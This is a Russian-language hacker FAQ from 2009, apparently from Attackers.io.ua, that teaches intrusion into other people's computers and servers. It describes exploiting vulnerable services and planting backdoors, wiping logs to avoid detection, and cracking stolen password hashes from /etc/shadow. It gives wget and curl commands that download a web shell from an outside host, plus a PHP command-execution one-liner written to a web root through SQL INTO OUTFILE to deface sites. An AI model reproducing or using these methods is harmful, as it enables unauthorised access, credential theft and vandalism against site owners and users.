[ Attackers.io.ua © 2009 ] ALL WEB IN HERE...

 

FAQ, читать всем!




Автор: Pupkin-Zade

Универсальный ФАК тут: http://google.com пишеш ему вопрос, а он тебе кучу ответов!!!

Собрание ссылок, желательно посетить все...

Вот по этим ссылкам походите:

http://inattack.ru
http://www.xakep.ru
http://xakepy.ru
http://web-hack.ru
http://nsd.ru
http://seclab.ru
http://securityfocus.com
http://security.nnov.ru
http://antichat.ru
http://hackersfaqs.h11.ru
http://gh0sts.void.ru
http://nst.void.ru
http://anonymous.ru
http://videohack.ru
http://hack.com.ru
http://security.nnov.ru
http://video.antichat.net
http://web-hack.ru
http://pro-hack.ru

Как узнать что скрывается за IP-адресом
http://www.ripn.net:8080/nic/whois/

Меня хотят взломать! Что мне делать чтобы защитится?!
Ну во первых не сЦы!!!
Если тебя реально бы хотели сломать, то не говорили бы тебе об этом, а делалибы все молча...
Если у тебя винда, ставь заплатки от микромягких. и поставь sp2 ели еще не стоит.
если у тебя *nix поищи заплатки для своего ядра.
Если у тебя на машине крутятся бажные демоны (сервисы), про бажные сервисы (демоны) можно посмотреть на seclab.ru, security.nnov.ru, securityfocus.ru, ну и xakep.ru ))) пропатч их!
Поставь файрвол (firewall)...
см п1.

Как не спалиться при взломе?
юзать анонимный прокси ( читай ниже )
Заметать следы... для этого используй какойнить логклинер типа vanish2 и тп...
Ну и сильно не следите )))

Как запустить перловый эксплоит?
для(win): устанавливаешь Active Perl например в C:perl
дальше открываешь коммандную строку, пишешь c:perlperl.exe x:pathtoexploit.pl нужные_аргументы

для(*nix):
Если перл не установлен, качаешь и устанавливаешь, например он будет в /usr/bin/perl, ну а дальше в консоли пишешь /usr/bin/perl /path/to/exploit.pl

Как мне залесть в чужой комп (что делать с IP адресом)?
гг... ну для начала его нада сломать ))) сканируешь его на бажные сервисы, если таковые имеются используеш их с помощью експлоитов, которые можно найти по ссылкам в самом начале ФАКа... компилируеш експлоит(читай фак) запускаешь... допустим у тебя теперь есть удаленная коммандная строка... заливаешь бекдор на взломанную машину, и юзаеш его... для винды например в win можно залить радмина(RAdmin [Remote Administrator]) по его настройке идите в гугл... и вот теперь у вас полноценный доступ к другому компу ))) даже мышкой можно пошевелить ))))

Есть пароль стыреный с форума такого вида: 202cb962ac59075b964b07152d234b70 что с ним делать?
Ну вопервых это не пароль, а md5-хеш от пароля...
Есть такая прога md5-Inside под винду, ей можно сбрутить этот хеш... качать тут: http://nsd.ru/soft/1/ano/md5inside.zip

Есть содержимое /etc/passwd что там интересного
Если админ сервера не полный олух то там ничего интересного нету... кроме логинов юзеров... т.к. все пароли содержаться в /etc/shadow
Например в если в файле /etc/passwd написано что то типа: root:*:0:0:root:/root:/bin/bash то тут ничего интересного... хеш пароля должен быть вместо звездочки...
но если там что-то типа: root:$1$OQ.PPy.z$PYjOjOD5WlHBJPYM9i0tg0:0:0:root:/root:/bin/bash то тебе повезло! $1$OQ.PPy.z$PYjOjOD5WlHBJPYM9i0tg0 и есть хеш пароля рута... берешь john the ripper и... как его юзать читай сдесь: рttp://inattack.ru/search.php?s=john

Есть содержимое /etc/shadow что там интересного?
Оооо, да там все интересно! Считай что ты нарвался на золотую жилу =)
Берешь Джоника (john the ripper) качать тут: http://openwall.com/john/ с помощью него брутишь des-хеш пароля пользователя под именем root %)
Описани по работе с JTR можно найти везде... вот для ленивых: http://inattack.ru/search.php?s=john

как юзать nmap?
http://inattack.ru/article/48

у меня есть веб-шелл, как мне получить больше информации о сервере?
ну uname -a это стандартно =)))) еще cat /proc/motd и еще много всего... вот тут написано много чего: http://inattack.ru/article/131

что такое sql-inj и с чем его едят
http://inattack.ru/article/163
http://www.xakep.ru/post/19146/default.asp

какие есть баги веб-скриптов?
http://www.xakep.ru/magazine/xa/070/060/1.asp
http://www.web-hack.ru/articles/articles.php?go=10

Как мне закачать что нибудь на сервер???
lynx: lynx -source "http://yoursite.com/shells/shell.php" >shell.php
1inks: анолагично lynx
wget: wget -O shell.php http://yoursite.com/shells/shell.php
GET: GET http://yoursite.com/shells/shell.php > shell.php
fetch: fetch -o shell.php http://yoursite.com/shells/shell.php
curl: curl --output shell.php http://yoursite.com/shells/shell.php

где мне взять *nix-шелл?
http://www.xakep.ru/magazine/xa/067/054/1.asp

что должен знать хакИр?
Ну вопервых php, perl, cc++, asm, *nix подобные системы....
еще теорию сетей и т.п. технич инфу... описание протоколов (http://rfc.net/)... и еще много всякой теории... вощем гугл в руки и искать!
Вот несколько ссылок:
php.net (php)
forum.sources.ru (php, perl, cc++, asm, *nix)
forum.xakep.ru (php, perl, cc++, asm, *nix)
codenet.ru
realcoding.net
proglib.ru (книги)

Как стать хакером?
http://www.xakep.ru/post/13458/default.asp

почему не компилится сполит?
Потомучто скорее всего в нем СПЕЦИАЛЬНО допущены ошибки ( чаще всего детские ) чтобы всякие ламеры не начинали безпределить...

как сломать мыло?
искать баги в веб-итерфейсе почтовика... например xss или sql-inj ))))
Сбрутить aka подобрать пароль для почтового ящика... для этого есть спец проги, такие как brutus(win) и т.д.
Соц. инженерия...

есть админка форума как мне задефейсить сайт?
в этом случае тебе поможет конструкция SQL-запроса с выводом INTO OUTFILE
сначала регаешься с мылом допустим <? system($_GET['cmd']); ?> потом выполняешь sql-запрос : SELECT null,null,email,.... INTO OUTFILE '/path/to/www/shell.php'

как поствить свой собственный socks-сервер?
http://www.xakep.ru/magazine/xa/070/070/1.asp

Где взять прокси и как его юзать?
Взять прокси-листы можно тут:
http://inattack.ru/proxy.php
http://www.samair.ru/proxy/
http://www.web-hack.ru/proxy/
http://www.freeproxy.ru/ru/
http://www.proxy4free.com/
http://www.anonymizer.com/
http://www.anonymizer.ru/

ну и несколько прокси-чекеров:
http://www.checker.freeproxy.ru/checker/
http://www.samair.ru/proxy/proxychecker/

Юзать так:
Opera : Tools->Preferences(Ctrl+F12)->Network->proxy server пишем тут ip адрес и порт проксика, нажимаем ок. далее нажимаем F12 и ставим галочку около Enable Proxy Servers
IE: Сервис->Св-ва обозревателя->гдето-там...
если пользуетесь другими браузерами, то все вопросы к гуглу и яндексу %)


Ну и конечно же читать Хакер %))


inattack.ru


Создан 03 ноя 2009



  Комментарии       
Имя или Email


При указании email на него будут отправляться ответы
Как имя будет использована первая часть email до @
Сам email нигде не отображается!
Зарегистрируйтесь, чтобы писать под своим ником
 





DaMaGeLaB Pro-Hack.Ru XakNet TeaM InAttack BlackHack.Ru The Mafia
k0d.cc GraBBerZ.CoM BruteR.InfO Планету-ХаКеРаМ Defeated.Ru
World UNIX SecNull.Org CardersPlanet.Biz